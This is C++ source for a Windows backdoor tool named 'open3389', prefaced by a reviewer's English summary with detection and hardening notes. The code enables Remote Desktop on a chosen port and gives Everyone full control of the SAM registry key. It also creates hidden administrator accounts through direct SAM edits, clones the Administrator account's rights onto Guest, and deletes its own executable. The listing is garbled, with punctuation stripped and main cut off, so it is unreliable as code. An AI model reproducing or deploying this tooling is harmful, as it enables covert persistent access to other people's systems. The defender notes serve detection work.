// NOTE(review): this listing was damaged during extraction. Brackets, semicolons,
// operators, backslashes and the '#'/'%' characters are missing, and the entity
// names quot/lt/gt/amp stand where the original characters were. It does not
// compile as shown, the end of main is cut off, and the text below is unchanged.
//
// What the visible code does, function by function:
//   Open3389(port)       - writes Terminal Services registry values: TSEnabled = 1,
//                          fDenyTSConnections = 0, Start = 2 for the TermDD and
//                          TermService service keys, EnableAdminTSRemote = 1, and
//                          PortNumber under three Terminal Server sub-keys.
//   ResetTermsPort(port) - rewrites only the three PortNumber values.
//   GetUserSID(user)     - opens the SAM ...Users\Names\<user> key and formats the
//                          registry *type* of its default value as hex (the code
//                          treats that type field as the account's RID).
//   GetSecurity()        - adds an inheritable "Everyone" KEY_ALL_ACCESS entry to the
//                          DACL of the MACHINE\SAM\SAM key. No visible code removes it.
//   CreateHideUser(u,p)  - runs net.exe "user <u> <p> /add" with SW_HIDE, reads the
//                          "F" value of Users key 000001F4 and the "V" value of the
//                          new account, runs net.exe "user <u> /del", then re-creates
//                          the account's SAM keys directly with those F and V values.
//   DelSid / DelUser     - delete a key under ...Users or ...Users\Names.
//   CloneID()            - copies the "F" value of Users key 000001F4 (RID 500) onto
//                          000001F5 (RID 501); the usage text calls this cloning GUEST
//                          into an administrator.
//   ListUser()           - enumerates local accounts with NetUserEnum at level 3.
//   EnablePrivilege(p)   - enables one named privilege on the current process token.
//   Usage(argv)          - prints the option list and the three PortNumber values.
//   DeleteMe()           - starts the COMSPEC shell hidden with "/c del <own path>" so
//                          the executable is removed once the program exits.
//
// Detection and hardening notes for defenders:
//   - Audit writes to the Terminal Server, TermDD and TermService keys (Security
//     event 4657, Sysmon events 12/13). A changed fDenyTSConnections or PortNumber,
//     or an RDP listener on a non-default port, is a strong signal.
//   - Check the DACL on HKLM\SAM\SAM. An "Everyone" full-control entry is never
//     legitimate and persists after this tool has run (event 4670 if audited).
//   - Correlate account creation (4720) followed within seconds by deletion (4726)
//     of the same name, with net.exe launched from a hidden parent (4688, Sysmon 1).
//   - Compare SAM ...Users\Names sub-keys with the accounts the account APIs report,
//     and compare the F value of every account with that of RID 500. A match on
//     Guest or on an account that "net user" does not list indicates cloning.
//   - Keep Guest disabled and restrict RDP logon rights to named groups.
//   - The helpers appear to format caller-supplied strings into fixed-size buffers
//     and to return pointers to local buffers (hedged: the text is garbled), so
//     expect crashes and partially applied changes on affected hosts.
// open3389.cpp : Defines the entry point for the console application.//include quotstdafx.hquotinclude ltstdio.hgtinclude ltwindows.hgtinclude quotRegistry.hquot//include quotCloneSID.hquotinclude quotFindPass.hquotinclude ltAclapi.hgtinclude ltlm.hgtpragma commentlibquotnetapi32.libquotvoid Open3389DWORD port CRegistry reg reg.OpenquotSOFTWAREMicrosoftWindowsCurrentVersion0quot reg.CreateKeyquotnetcachequot reg.WriteStringquotEnabledquotquot0quot reg.OpenquotSOFTWAREPoliciesMicrosoftWindows0quot reg.CreateKeyquotInstallerquot reg.WriteDwordquotEnableAdminTSRemotequot1 if reg.OpenquotSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon0quot reg.WriteStringquotShutdownWithoutLogonquotquot0quot if reg.OpenquotSYSTEMCurrentControlSetControlTerminal Server0quot reg.WriteDwordquotTSEnabledquot1 if reg.OpenquotSYSTEMCurrentControlSetServicesTermDD0quot reg.WriteDwordquotStartquot2 if reg.OpenquotSYSTEMCurrentControlSetServicesTermService0quot reg.WriteDwordquotStartquot2 if reg.OpenquotSYSTEMCurrentControlSetControlTerminal Server0quot reg.WriteDwordquotfDenyTSConnectionsquot0 if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot reg.WriteDwordquotPortNumberquotport reg.ReSetMainKeyHKEY_USERS if reg.Openquot.DEFAULTKeyboard LayoutToggle0quot reg.WriteStringquotHotkeyquotquot2quot reg.Closevoid ResetTermsPortDWORD port CRegistry reg if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot reg.WriteDwordquotPortNumberquotport if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot reg.WriteDwordquotPortNumberquotportchar GetUserSIDTCHAR user HKEY hKey DWORD dwValue char 
ret NULL char strType32 DWORD dwRegType TCHAR lpSubKey128 wsprintflpSubKeyquotSAMSAMDomainsAccountUsersNamessquotuser if0RegOpenKeyHKEY_LOCAL_MACHINElpSubKey amphKey DWORD dwLensizeofDWORD RegQueryValueExhKeyquotquotNULLampdwRegTypeBYTEampdwValue ampdwLen RegCloseKeyhKey wsprintfstrTypequot-20st-SID-gt08XquotuserdwRegType ret strType else ret quotNULLquot return retBOOL GetSecurity DWORD dwRet LPSTR SamName quotMACHINESAMSAMquot PSECURITY_DESCRIPTOR pSD NULL PACL pOldDacl NULL PACL pNewDacl NULL EXPLICIT_ACCESS ea HKEY hKey NULL dwRet GetNamedSecurityInfoSamName SE_REGISTRY_KEYDACL_SECURITY_INFORMATION NULL NULL amppOldDacl NULL amppSD if dwRet ERROR_SUCCESS return FALSE ZeroMemoryampea sizeofEXPLICIT_ACCESS BuildExplicitAccessWithNameampea quotEveryonequot KEY_ALL_ACCESS SET_ACCESS SUB_CONTAINERS_AND_OBJECTS_INHERIT dwRet SetEntriesInAcl1 ampea pOldDacl amppNewDacl if dwRet ERROR_SUCCESS return FALSE dwRet SetNamedSecurityInfoSamName SE_REGISTRY_KEYDACL_SECURITY_INFORMATION NULL NULL pNewDacl NULL if dwRet ERROR_SUCCESS return FALSE if pNewDacl LocalFreepNewDacl if pSD LocalFreepSD return TRUE BOOL CreateHideUserchar userchar pass char ParamMAX_PATH wsprintfParamquot user s s /addquotuserpass HINSTANCE nRet ShellExecute0 quotopenquot quotnet.exequot Param NULL SW_HIDE ifintnRet lt 32 return FALSE printfquotCreate s Success...rnquotuser HKEY hKey DWORD dwValue char strType32 DWORD dwRegType TCHAR lpSubKey128 wsprintflpSubKeyquotSAMSAMDomainsAccountUsersNamessquotuser printfquotOpen s...rnquotlpSubKey int nCount 0 while1 if0RegOpenKeyHKEY_LOCAL_MACHINElpSubKey amphKey DWORD dwLensizeofDWORD RegQueryValueExhKeyquotquotNULLampdwRegTypeBYTEampdwValueampdwLen RegCloseKeyhKey wsprintfstrTypequot08XquotdwRegType printfquotGet Registry Value s...rnquotstrType break Sleep50 nCount ifnCount gt 100 return FALSE LPBYTE lpDataFlpDataV lpDataF LPBYTE malloc10242 lpDataV LPBYTE malloc102410 ZeroMemorylpDataF10242 ZeroMemorylpDataV102410 DWORD SizeF1024 2 DWORD SizeV1024 10 
if0RegOpenKeyExHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsers000001F4quot 0KEY_ALL_ACCESSamphKey DWORD dwType REG_BINARY DWORD dwLensizeofDWORD RegQueryValueExhKeyquotFquotNULLampdwTypelpDataF ampSizeF RegCloseKeyhKey HKEY c_hKey TCHAR lpSubKey2128 wsprintflpSubKey2quotSAMSAMDomainsAccountUserssquotstrType printfquotOpen s...rnquotlpSubKey2 if0RegOpenKeyExHKEY_LOCAL_MACHINElpSubKey20KEY_ALL_ACCESSampc_hKey DWORD dwType REG_BINARY DWORD dwLensizeofDWORD RegQueryValueExc_hKeyquotVquotNULLampdwTypelpDataV ampSizeV RegCloseKeyc_hKey wsprintfParamquot user s /delquotuser nRet ShellExecute0 quotopenquot quotnet.exequot Param NULL SW_HIDE ifintnRet lt 32 return FALSE printfquotDelete s Success...rnquotuser nCount 0 while1 ifERROR_SUCCESSRegOpenKeyExHKEY_LOCAL_MACHINElpSubKey0KEY_ALL_ACCESSampc_hKey if RegCreateKeyHKEY_LOCAL_MACHINE lpSubKey amphKey ERROR_SUCCESS DWORD dwLensizeofDWORD DWORD dwValue NULL RegSetValueExhKeyquotquotNULLdwRegTypeNULL 0 RegCloseKeyc_hKey break RegCloseKeyc_hKey Sleep50 nCount ifnCount gt 100 return FALSE printfquotNow Create s Registry Key...quotuser if RegCreateKeyHKEY_LOCAL_MACHINE lpSubKey2 amphKey ERROR_SUCCESS DWORD dwLensizeofDWORD DWORD dwValue NULL RegSetValueExhKeyquotFquotNULLREG_BINARYlpDataF SizeF RegSetValueExhKeyquotVquotNULLREG_BINARYlpDataV SizeV RegCloseKeyhKey printfquotSuccessrnquot printfquotOKrnUSER: srnPASS: squotuserpass return TRUE BOOL DelSidchar sid HKEY hkey DWORD ret char C_sid10 if strncmpsidquot00000quotstrlenquot00000quot 0 wsprintfC_sidquotsquotsid else wsprintfC_sidquot00000squotsid retRegOpenKeyHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsersquotamphkey if retERROR_SUCCESS return FALSE retRegDeleteKeyhkeyC_sid RegCloseKeyhkey if retERROR_SUCCESS return TRUE else return FALSE BOOL DelUserchar user HKEY hkey DWORD ret char C_user40 wsprintfC_userquotsquotuser retRegOpenKeyHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsersNamesquotamphkey if retERROR_SUCCESS return FALSE retRegDeleteKeyhkeyC_user RegCloseKeyhkey if 
retERROR_SUCCESS return TRUE else return FALSE BOOL CloneID HKEY hkeyC_hkey DWORD TypeREG_BINARYSizeF10242SizeV102410ret char CloneSid100 LPBYTE lpDataF LPBYTE lpDataV lpDataF LPBYTE malloc10242 lpDataV LPBYTE malloc10242 ZeroMemorylpDataF10242 ZeroMemorylpDataV10242 wsprintfCloneSidquotSAMSAMDomainsAccountUsers000001F5quot retRegOpenKeyExHKEY_LOCAL_MACHINEquotSAMSAMDomainsAccountUsers000001F4quot0KEY_ALL_ACCESSamphkey ifretERROR_SUCCESS return FALSE ret RegQueryValueExhkeyquotFquotNULLampTypelpDataFampSizeF ifretERROR_SUCCESS return FALSE ret RegOpenKeyExHKEY_LOCAL_MACHINECloneSid0KEY_ALL_ACCESSampC_hkey ifretERROR_SUCCESS return FALSE ret RegSetValueExC_hkeyquotFquot0REG_BINARYlpDataFSizeF ifretERROR_SUCCESS printfquotClone User Successnquot else printfquotClone User FAILnquot return FALSE RegCloseKeyhkey RegCloseKeyC_hkey return TRUE char ListUser char Temp1024 0 char retbuf4096 0 LPUSER_INFO_3 pBuf NULL LPUSER_INFO_3 pTmpBuf DWORD i DWORD dwLevel 3 DWORD dwPrefMaxLen -1 DWORD dwEntriesRead 0 DWORD dwTotalEntries 0 DWORD dwResumeHandle 0 LPTSTR pszServerName NULL NET_API_STATUS nStatus sprintfTempquotrn-20st-16s-7srnrnquotquotUSERquotquotSIDquotquotDOMAINquot strcpyretbufTemp do nStatus NetUserEnumNULLdwLevelFILTER_NORMAL_ACCOUNTLPBYTEamppBufdwPrefMaxLenampdwEntriesReadampdwTotalEntriesampdwResumeHandle if nStatus NERR_Success nStatus ERROR_MORE_DATA if pTmpBuf pBuf NULL for i 0 i lt dwEntriesRead i if pTmpBuf NULL sprintfTempquotAn Access Violation Has Occurredrnquot strcatretbufTemp break sprintfTempquotSquot pTmpBuf-gtusri3_name strcatretbufGetUserSIDTemp switchpTmpBuf-gtusri3_priv case USER_PRIV_GUEST: sprintfTempquott-gt-7strnquotquotGuestquot break case USER_PRIV_USER: sprintfTempquott-gt-7strnquotquotUserquot break case USER_PRIV_ADMIN: sprintfTempquott-gt-10strnquotquotAdministratorquot break default: sprintfTempquott-gt-7strnquotquotUnknowquot break //for pTmpBuf strcatretbufTemp //if sprintfTempquotrnOK...rnquot else sprintfTempquotrnNetUserEnum Error: 
drnquotGetLastError strcatretbufTemp if pBuf NULL NetApiBufferFreepBuf pBuf NULL while nStatus ERROR_MORE_DATA if pBuf NULL NetApiBufferFreepBuf char ret retbuf return ret BOOL EnablePrivilegeLPTSTR privilege int success HANDLE token LUID luid TOKEN_PRIVILEGES tokenprivileges successOpenProcessTokenGetCurrentProcess TOKEN_ADJUST_PRIVILEGESTOKEN_QUERYamptoken if success return FALSE successLookupPrivilegeValue0privilegeampluid if success return FALSE tokenprivileges.PrivilegeCount1 tokenprivileges.Privileges0.AttributesSE_PRIVILEGE_ENABLED tokenprivileges.Privileges0.Luidluid successAdjustTokenPrivilegestokenfalseamptokenprivileges000 if success return FALSE else return TRUEvoid Usagechar argv printfquotrnt 多功能开 3389 工具 by 特南克斯rnrnquot printfquots 直接运行默认开 3389 端口并重起删除自身rnquotargv printfquots PORT 开启自定义终端端口,默认重起删除自身rnquotargv printfquots -l 列举系统用户rnquotargv printfquots -f Find Administrator Passrnquotargv printfquots -h/ 帮助信息与察看终端端口rnrnquotargv printfquots -r PORT 开终端并重起rnquotargv printfquots -n PORT 开终端不重起rnquotargv printfquots -s PORT 重新设置终端端口rnquotargv printfquots -a USER PASS 添加隐藏的管理员用户rnquotargv printfquots -d USER 删除用户rnquotargv printfquots -c PASS 把 GUEST 克隆成管理员用户rnrnquotargv printfquotrnt 察看终端端口rnquot CRegistry reg if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerRDPTcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot if reg.OpenquotSYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp0quot printfquot-30s drnquotquot终端端口:quotreg.ReadDwordquotPortNumberquot BOOL DeleteMe TCHAR szModule MAX_PATH szComspecMAX_PATH szParams MAX_PATH // get file path names: ifGetModuleFileName0szModuleMAX_PATH0 ampamp GetShortPathNameszModuleszModuleMAX_PATH0 ampamp GetEnvironmentVariablequotCOMSPECquotszComspecMAX_PATH0 // set command shell parameters lstrcpyszParamsquot /c del quot 
lstrcatszParams szModule lstrcatszParams quot gt nulquot lstrcatszComspec szParams // set struct members STARTUPINFO si0 PROCESS_INFORMATION pi0 si.cb sizeofsi si.dwFlags STARTF_USESHOWWINDOW si.wShowWindow SW_HIDE // increase resource allocation to program SetPriorityClassGetCurrentProcess REALTIME_PRIORITY_CLASS SetThreadPriorityGetCurrentThread THREAD_PRIORITY_TIME_CRITICAL // invoke command shell ifCreateProcess0 szComspec 0 0 0CREATE_SUSPENDED DETACHED_PROCESS 0 0 ampsi amppi // suppress command shell process until program exits SetPriorityClasspi.hProcessIDLE_PRIORITY_CLASS SetThreadPrioritypi.hThreadTHREAD_PRIORITY_IDLE // resume shell process with new low priority ResumeThreadpi.hThread // everything seemed to work return TRUE else // if error normalize allocation SetPriorityClassGetCurrentProcess NORMAL_PRIORITY_CLASS SetThreadPriorityGetCurrentThread THREAD_PRIORITY_NORMAL return FALSEint mainint argc char argv if argc 1 Open3389DWORD3389 if argc.